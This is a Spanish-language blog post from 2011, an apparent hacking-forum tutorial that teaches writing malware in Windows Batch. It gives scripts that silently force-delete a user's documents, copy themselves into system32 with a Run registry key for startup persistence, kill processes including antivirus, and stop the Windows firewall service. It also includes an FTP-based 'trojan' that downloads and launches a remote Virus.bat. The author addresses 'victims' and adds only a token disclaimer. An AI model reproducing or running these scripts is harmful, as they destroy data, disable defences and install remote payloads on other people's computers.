domingo, 11 de septiembre de 2011

Manual Batch (Nivel Medio 2da) By 2Fac3R

PARTE DEDICADA AL MALWARE!
Hola compañeros recordar que esta es la segunda parte del Manual Batch (Nivel Medio) By 2Fac3R/RocKeG, y esta parte esta dedicada a los Malwares, esta sera la parte mas extensa del manual asi que preparence, los temas que veremos aqui seran, Bucle, Virus, Worms, ProcessKiller, AvKiller y Troyanos, tambien mencionar que no me hago responsable de el mal uso del que le den a esta informacion, unicamente lo hago con el fin de que aprendan a hacer sus programas en Batch, sin mas hire por el orden mencionado asi que manos a la obra!!!:

Ya habia mencionado lo de los Bucles, y se los habia dejado a su busqueda, ahora veremos varias formas de hacer un Bucle, vamos a un ejemplo sencillo de un Bucle infinito:
Código: [Seleccionar]
@echo off
:inicio
Start www.hackxcrack.es
Goto :inicio
ExitEste codigo lo que hara seia crear una etiqueta llamada a :inicio� y abre el foro de HxC infinitamente hasta que la pc se trabe, ahora vamos a un peque�o Bucle con diferentes cosas:

Código: [Seleccionar]
@echo off
:inicio
Start /min www.hackxcrack.es
Start/min www.masters-hackers.info
Start/min www.foro.el-hacker.com
Start/min www.i-hacker.info
Start
Goto:inicio
exit
Lo que hace el code es simple, aprovecho para invitarlos a que vayan a estas comunidades donde me he sentido muy bien en ellas , bien, el bucle no es tan interesante, �nicamente es para hacer una peque�a bromita, pero recuerda que hacer mucho esto es de lammers , asi que solo h�ganlo para aprender como funka :p, ok seguire con los Virus, que este concepto se tiene muy diferente por los que andamos en esto del Hacking, en lo personal para mi un Virus es un archivo que solo se encarga de destruir mas archivos, con el fin �nicamente de Ch1nG4R al administrador de la pc, no recomiendo que distribuyan sus �Virus� porque para mi eso es de lammers, pero bueno sigo con el code, dado mi discurso, sabemos que un virus es para borar archivos asi que supongo que sabras como esta compuesto un virus en Batch.
-Mmm� con �Del�?-
Exacto! Entonces vamos a codear, bien �Qu� queremos que haga nuestro Virus?, mmm� pues empezare con un simple virus que destruya todos los archivos de la carpeta �Mis documentos�, para ello es necesario conocer las variables de entorno para este caso vamos a usar una que llevamos usando.
Citar
�Ahh ya s�! %homepath%-

Exacto!, vamos al code.

Código: [Seleccionar]
@echo off
Del %homepath%\Mis documentos\*.*
ExitNO LO EJECUTES!!

Antes decirte que este code para ser Virus pues no nos funcionaria porque pide confirmaci�n para que elimine los archivos y l�gicamente la victima no lo ejecutara, entonces para que nos funcione vamos a usar algo mas reforzado, usaremos el comando �attrib� y los par�metros de �del�, vamos a cmd y tecleamos �del /?� (sin comillas) y veamos que nos sale�:
Código: [Seleccionar]
Elimina uno o mas archivos.

DEL [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres
ERASE [/P] [/F] [/S] [/Q] [/A[[:]atributos]] nombres

nombres Especifica una lista de uno o m s archivos o directorios.
Se puede utilizar comodines para eliminar varios archivos.
Si se especifica un directorio todos sus archivos se eliminar n.


/P Pide confirmaci�n antes de eliminar cada archivo.
/F Fuerza la eliminaci�n de archivos de s�lo lectura.
/S Elimina archivos especificados en todos los subdirectorios.
/Q Modo silencioso. No pide confirmaci�n con comod�n global
/A Selecciona los archivos que se van a eliminar bas ndose en los
atributos
atributos R Archivos de s�lo lectura S Archivos de sistema
H Archivos ocultos A Archivos preparados para
almacenamiento
- Prefijo de exclusi�n

Si las extensiones de comando est n activadas DEL y ERASE cambian de la siguiente manera:

La sem ntica que se muestra para el modificador /S est invertida de tal modo
que le muestra solamente los archivos eliminados y no los que no se encontraron.

Analicemos los par�metros, nos dice que el par�metro �/f� fuerza la eliminaci�n del archivo, pues vamos a usarlo, usaremos tambi�n el �/s� para que elimine en todos los subdirectorios y usaremos �/q� para que sea �Silencioso�.
-�Entonces como quedar�a el code?-
Pues el code quedar�a asi:
Código: [Seleccionar]
@echo off
Attrib �r �a � s �h �%homepath%\Mis documentos\*.*
Del /p /q /s %homepath%\Mis documentos\*.*
Exit
-
Citar
Ohh crei que se te hab�a olvidado lo del comando Attrib que mencionaste que usar�amos pero ahora veo que no -
Pues ya ves que no :p, entonces ese seria el code, no lo ejecuten en su maquina a menos que tengan una maquina virtual para este tipo de pruebas, si eres mas avanzado quiz�s pienses:
Citar
-Que le pasa a este man, porque no usa for y se deja de escribir tanto c�digo-
Claro!, creo que tienes algo de raz�n pero como he dicho a lo largo de estos manuales que lo dejare a tu b�squeda, pero no te preocupes va a llegar alg�n momento en donde explique el comando, todo a su tiempo :p. Antes de continuar lo dejo a su imaginaci�n �que borran� con su peque�o virus en Batch, recuerden que sabiendo como funka una pc podr�n borrar ciertos archivos y dejarla inservible (para algunas victimas, otras no son tan tontas y pueden recuperarse bajo este tipo de �ataques�, pero pues son menos que las que no ) , bien sigamos con lo que nos interesa, ahora les mencionare �como� hacer un worm, ya hab�amos hecho uno en el primer manual, pero era muy simple para que nos interesara al 100, pues ahora voy a suponer que tienes tu �virus� y lo quieres propagar (o saber como se propaga con Batch ) , lo que vamos a hacer con nuestro virus es copiarlo a la carpeta �system32� y agregarlo al registro para que se inicie con Windows ?, quiz� esto te suene a Chino, pero es aqu� donde se va a alargar este tuto, voy a explicar el uso del registro (brevemente, ya sabes, si quieres algo mas complejo busca por Google|Altavista|Yahoo o el que desees), tambi�n explicare el uso del For
Citar
-Por fin!!!, el famoso for!-
Y varias cosillas mas, bueno primero les mostrare el code e ire explic�ndolo:
Código: [Seleccionar]
@echo off
REG ADD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VIRUS.bat /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f

Copy %0 %windir%\system32

Exit
Con eso es mas que suficiente, lo dem�s lo dejare a su b�squeda ya que no me gusta este tipo de cosas, solo las explico para que aprendan como funciona y como defenderse de ellas, bueno explico; Lo primero es cuando se agrega al registro, en este caso se va a agregar al Run, para que se inicie con Windows, donde dice �VIRUS.bat� es donde vas a poner la ruta del �Virus� que hemos creado o poner la ruta del programa que quieres que se incie con Windows , la siguiente l�nea les debe ser conocida ya que ya la hab�amos usado anteriormente, pero por si se te hab�a olvidado, se copia a si mismo en la carpeta system32 que esta en la carpeta �Windows�. En este caso les dejare una tarea xD, espero que la hagan no como en la escuela que no las entregan xD, la peque�a tarea es que se copie a cualquier dispositivo USB que se conecte, te dare una pista; Usa el comando �IF exist� que seguramente ya lo hab�as buscado por ah�, puedes mand�rmelo por mp o simplemente postearlo en los foros anteriormente mencionados o de donde sacaste este manual (Excepto Taringa xD). Muy bien, sigamos con el manual, empezaremos con un peque�os Taskkiller (Asesino de procesos), esto nos servir� para poder sacar del juego casi cualquier proceso (esto incluye el de los AntiVirus (AV), los comandos que aprenderemos en este tuto son el Tskill o TaskKill y tasklist. Nosotros utilizaremos tskill, bien voy a un ejemplo simple de su uso, primero abriremos el internet explorer ?

Código: [Seleccionar]
@echo off
Tskill 1716
Exit
-
Citar
Como pero asi de f�cil?-
Claro esto es muy f�cil, lo �nico que tienes que hacer es poner el nombre del proceso a eliminar.

�Pero como le hago si quiero eliminar otro proceso?, explicame otro ejemplo para tenerlo mas claro, adem�s no entend� porque ese numero -

Bien, te explicare otro, abre la calculadora del Windows.


Inicio --> Todos los programas --> accesorios --> calculadora :D

Ahora ve al cmd (inicio --> ejecutar --> cmd ? enter) y teclea �tasklist�
Te ha salido una lista de los procesos que se est�n ejecutando en este momento, pues busca ahora el de la calculadora, Deberias haber encontrado un proceso llamado �calc.exe� con un pid de 544, pues adivina� Ese es el nombre que vamos a poner despu�s de tskill, vamos al code:

Código: [Seleccionar]
@echo off
Tskill 544
Exit
Y ejecutalo, recuerda que no deber�as de haber cerrado manualmente la calculadora antes, osea tiene que estar activa en el momento de que la ejecutes :D. Si eres un poco curioso te habras dado cuenta de que no has podido cerrar el proceso del AV, pues eso es algo mas complejo, para poderlo cerra primero debes saber que servicios lo est�n �Protegiendo� pero ese tema se sale de esto asi que lo dejare a tu b�squeda, para que busques espec�ficamente de tu AV :p, entonces buscado esto sabras como hacer un AVKiller, que es un programa en el que primero se quitan los procesos del AV y despu�s elimina por completo de donde se instalo, busca y busca seguro encontraras :D.Pero por si no encuentras en la pr�xima parte prometo poner un buen code de AVKiller ? si es que veo que hay gente que lo hace xD, Lo que sigue para mi es lo mejor, ya sabran los de HxC me ha pegado eso de poner lo mejor al final xD, asi que iremos a lo mejor que es el Troyano, en este caso lo voy a hacer con el comando Ftp (que seguro ya sabes lo del FTP porque te haz le�do las revistas ;) b�sicamente combonare varias cosas que hemos estado viendo en este manual.

VAMOS A CREAR UN TROYANO EN BATCH!!!

Bien empezare por explicarles el code que es este:
Código: [Seleccionar]
@echo off
Echo USER>Troj.tmp
Echo PASWORD>>Trojan.tmp
Echo get Virus.bat>>Trojan.tmp
Echo bye>>trojan.tmp
Echo quit>>trojan.tmp
Start �s:Trojan.tmp Servidor de FTP
Del /f /s /q Trojan.tmp
Start/min Virus.bat
Copy % %windir%\system32
Exit
Vamos a crear un archivo llamado �Trojan.tmp� con las siguientes caracter�sticas: Abrir el ftp poniendo nuestro nombre de usuario (que el lo que sustituiras para que te funcione al 100, despu�s ponemos la contrase�a que tenemos para usar el ftp, y vamos ahora a los comandos del ftp si vamos al cmd y tecleamos �ftp /?� veremos que nos dara error y autom�ticamente nos abrir� el servicio FTP, ahora ah� dentro ponemos �help� (sin las comillas) y nos saldr�n los comandos que podemos utilizar en el servicio FTP dentro de nuestro cmd o bat, voy ahora a explicar unos cuantos que nos servir�n como ayuda para nuestro peque�o troyano en batch, los comandos son, put, get, del, cd, mkdir, rename y rmdir. Los dem�s los dejare a su b�squeda, empecemos el comando del ftp �put� nos sirve para subir un archivo a nuestro servidor ftp, vamos a hacerlo en la cmd vamos a teclear �ftp� (recuerda que sin las comillas :D) y nos ha salido esto:



No recuerda que no soy adivino xD. Bien ahora tecleamos nuestro servidor ftp, en mi caso es Anime online :D, aprovecho para invitarlos a mi web. Ok sin mas vamos a la practica tecleamos �open www.elanime.do.am� (recuerda que debes sustituir por el nombre de tu servidor de ftp) y nos saldr� esto:

Ahora debemos poner el nombre de nuestro usuario y contrase�a, y nos saldr� esto:


Bien ahora estamos adentro de nuestro servidor ftp, vamos a hacer algo, subiremos y descargaremos archivos. Vamos al put , get y �dir�,
-Pero que has dicho? �Dir� es un comando del batch no?-
Claro veo que has estudiado por tu cuenta, recuerda que este manual es solo un peque�o �amigo� para aprender cosas que en otros manuales no he visto :D, bien sin mas vamos al ejemplo, vamos a hacer un dir. Vamos teclea �dir�

El dir nos listara los archivos que tenemos en nuestro ftp, y vemos varios archivo voy a bajar en especifico 1 y subir� un archivo de �prueba.txt�, basta de teor�a y vamos al ejemplo:

Como ven si le damos enter nos descargara el archivo mencionado, que es �libro3.jpeg� que en este caso es una imagen del 3er libro del Avatar xD (el libro fuego),

Este es el resultado que tienes que tener, ahora vamos a ver si nos la ha descargado en realidad:


xD disculpen que este tan distorsionada pero era para que se entendiera el ejemplo xD, sigamos, ahora vamos a subir un archivo, vamos a la cmd de nuevo, y tecleamos �put prueba.txt� (recuerda que yo subir� este archivo que esta en %homepath%
-�Por qu� ah�?-
Pues si te haz fijado en la primera imagen, al iniciar la cmd me aparece esa ruta por defecto, pondr� la imagen nuevamente :

Vemos, que nos aparece en donde dije, esto puede varias depende de la configuraci�n de la pc, asi que no te asusten ni pienses que no te funcionara si no tienes esta ruta :D, bien vamos a continuar.
Bien, se supone que haz intentado teclear �put prueba.txt� que en mi caso tiene que estar en %homepath% osea en la carpeta del usuario (si no entiendes esto del %homepath% leete las partes anteriores del manual).
Vamos a la imagen para que vean que funciona :D

Bien funciono, ahora vamos a hacer un dir para verificar que este ah� :D.


Aqu� estamos viendo el archivo �prueba.txt� (a la derechar) subido correctamente y lo dem�s que esta subrayado son los informe del archivo subido, ok ya entendido todo esto sabemos como funciona el servidor FTP y hemos hecho una prueba de subir y bajar archivos. Ahora vamos a transformarlo a batch y no solo en cmd, vamos a nuestro code de ejemplo el cual sube el prueba.txt y baja �libro3.jpeg�.
Código: [Seleccionar]
@echo off
Echo USUARIO>trojan.tmp
Echo PASSWORD>>trojan.tmp
Echo put prueba.txt>>trojan.tmp
Echo get libro3.jpeg>>trojan.tmp
Echo bye>>trojan.tmp
Echo exit>>trojan.tmp
ftp-s:trojan.tmp www.elanime.do.am
exit
Este es un simple �Troyano� el cual se puede hacer much�simo con esto, cabe decir que si el puerto necesitado por el ftp es el 23 como muchos ya sabran y pues si el puerto esta cerrado esto no funcionara, tampoco funcionara en caso de que el firewall nos bloquee el paso, para ello tenemos que hacer varias combinaciones de nuestros c�digos, por ejemplo primero cerraremos el firewall para ello necesitamos este code:
Código: [Seleccionar]
@echo off
Net Stop �Centro de Seguridad�
Net Stop �Firewall de Windows/Conexi�n compartida a Internet (ICS)�
Exit
Tambien mencionar que este code solo desactiva el firewall de Windows, si nuestra �Victima� tiene otro Firewall como el ZoneAlarm no funcionara ?, pero recuerden que lo dije en un principio :D.
Entonces lo dejo a su imaginaci�n, recuerden lo que hemos visto en esta parte, worm, virus, bucles, AvKiller, etc. Y si le hechan imaginaci�n seguro podras sacar sin problemas al firewall y al AV para poder meter nuestro peque�o �amiguito� (supongo que sabes a que me refiero no ;D.
Les recuerdo que pueden hacer con este manual lo que se les ocurra y se les antoje, menos decir que ustedes lo hicieron xD, recuerden mencionar el Autor del Manual.
Me despido
2Fac3R

PDF:

DESCARGAR -->Multiupload.com - upload your files to multiple file hosting sites!

NOTA: EN EL MANUAL MENSIONO IMAGENES NO HE SUBIDO (AUN) LAS IMAGENES SI QUIERES VERTELO POR EL MOMENTO, BAJATE EL PDF QUE VIENE CON LAS IMAGENES :D ASI QUE PONGANSE A ESTUDIAR.
Zalu2
Publicado por en 14:26
Etiquetas: , , , , , , , , , ,